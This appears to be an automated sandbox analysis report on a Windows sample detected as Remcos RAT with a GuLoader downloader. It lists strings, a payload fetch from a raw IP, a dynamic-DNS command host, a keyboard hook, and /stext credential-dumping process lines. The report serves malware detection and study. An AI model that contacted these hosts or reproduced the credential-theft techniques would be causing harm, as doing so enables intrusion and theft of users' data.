          Source: g4FtSOZMD9.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
          Source: g4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
          Source: unknownDNS traffic detected: queries for: nhtaxfilling.ddnsgeek.com
          Source: global trafficHTTP traffic detected: GET /1040_RyQoPlW98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 147.189.137.168Cache-Control: no-cache

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Installs a global keyboard hookShow sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\g4FtSOZMD9.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

          E-Banking Fraud:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
          Source: g4FtSOZMD9.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02296E2A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02285E30
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02285A4E
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228D09B
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02283939
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228DDDD
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228CE2E
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02282E19
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02282E67
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02295252
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02285B30
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02285B36
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228A760
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02281772
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02293C6F
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02281844
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_022828ED
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_022818CB
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02280947
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228395F
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_00081B0A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_0008510A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_00081407
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_00086D17
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_00087D45
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044B040
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044B870
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044081D
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0043610D
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044AA80
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_00447310
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044BBD8
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044A490
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0043C560
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_00446D30
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_00446D8B
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044B610
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044D6C0
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_004476F0
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004050C2
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004014AB
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00405133
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004051A4
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00401246
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_0040CA46
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00405235
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004032C8
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004222D9
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00401689
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00402F60
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_1_004222D9
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_0040D044
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00405038
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004050A9
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_0040511A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004051AB
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004382F3
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00430575
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_0043B671
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_0041F6CD
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004119CF
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00439B11
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00438E54
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00412F67
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_0043CF18
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_004382F3
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_00430575
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_0043B671
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_0041F6CD
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_00439B11
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_00438E54
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_1_0043CF18
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 004124F0 appears 33 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 004169A7 appears 87 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 00412627 appears 61 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 00412968 appears 153 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 00421A32 appears 71 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 00416760 appears 65 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: String function: 0044407A appears 37 times
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228DACD NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02296762 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228D09B NtWriteVirtualMemory,CreateFileA,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228DDDD NtWriteVirtualMemory,LoadLibraryA,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004016FC NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004017B6 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess Stats: CPU usage > 98%
          Source: g4FtSOZMD9.exe, 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000000.00000002.470911055.00000000020E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIndregnet8.exeFE2XCfarS vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000000.460170430.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000003.604551488.0000000020A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000003.582574015.0000000001C68000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000003.605978483.0000000001C8C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exeBinary or memory string: OriginalFileName vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000015.00000000.606786406.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exeBinary or memory string: OriginalFilename vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000016.00000001.608400388.0000000000422000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exe, 00000017.00000000.609082555.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exeBinary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
          Source: g4FtSOZMD9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: g4FtSOZMD9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: g4FtSOZMD9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Restroke.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Restroke.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Restroke.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: g4FtSOZMD9.exeVirustotal: Detection: 22%
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile read: C:\Users\user\Desktop\g4FtSOZMD9.exeJump to behavior
          Source: g4FtSOZMD9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: unknownProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeSystem information queried: HandleInformation
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile created: C:\Users\user\AppData\Roaming\ScreenshotsJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMPJump to behavior
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/24@1/2
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-UGB110
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile opened: C:\Users\user\Desktop\g4FtSOZMD9.cfg
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeUnpacked PE file: 22.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeUnpacked PE file: 23.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
          Yara detected VB6 Downloader GenericShow sources
          Source: Yara matchFile source: Process Memory Space: g4FtSOZMD9.exe PID: 7068, type: MEMORYSTR
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_00401F3C push eax; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228CE2E push edx; retf 2D64h
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02281E90 push esi; retn E555h
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02281E90 push esp; retf E809h
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228011A push ds; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7C4BD push esp; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CB54 push eax; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CF54 push eax; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CB50 push eax; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CF50 push eax; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CB64 pushad ; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CF64 pushad ; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CB60 pushad ; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CF60 pushad ; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CB68 push 6801C7CBh; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 9_3_01C7CF68 push 6801C7CFh; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044693D push ecx; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_004189F0 push FFFFFFAEh; iretd
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_00418981 push FFFFFFAEh; iretd
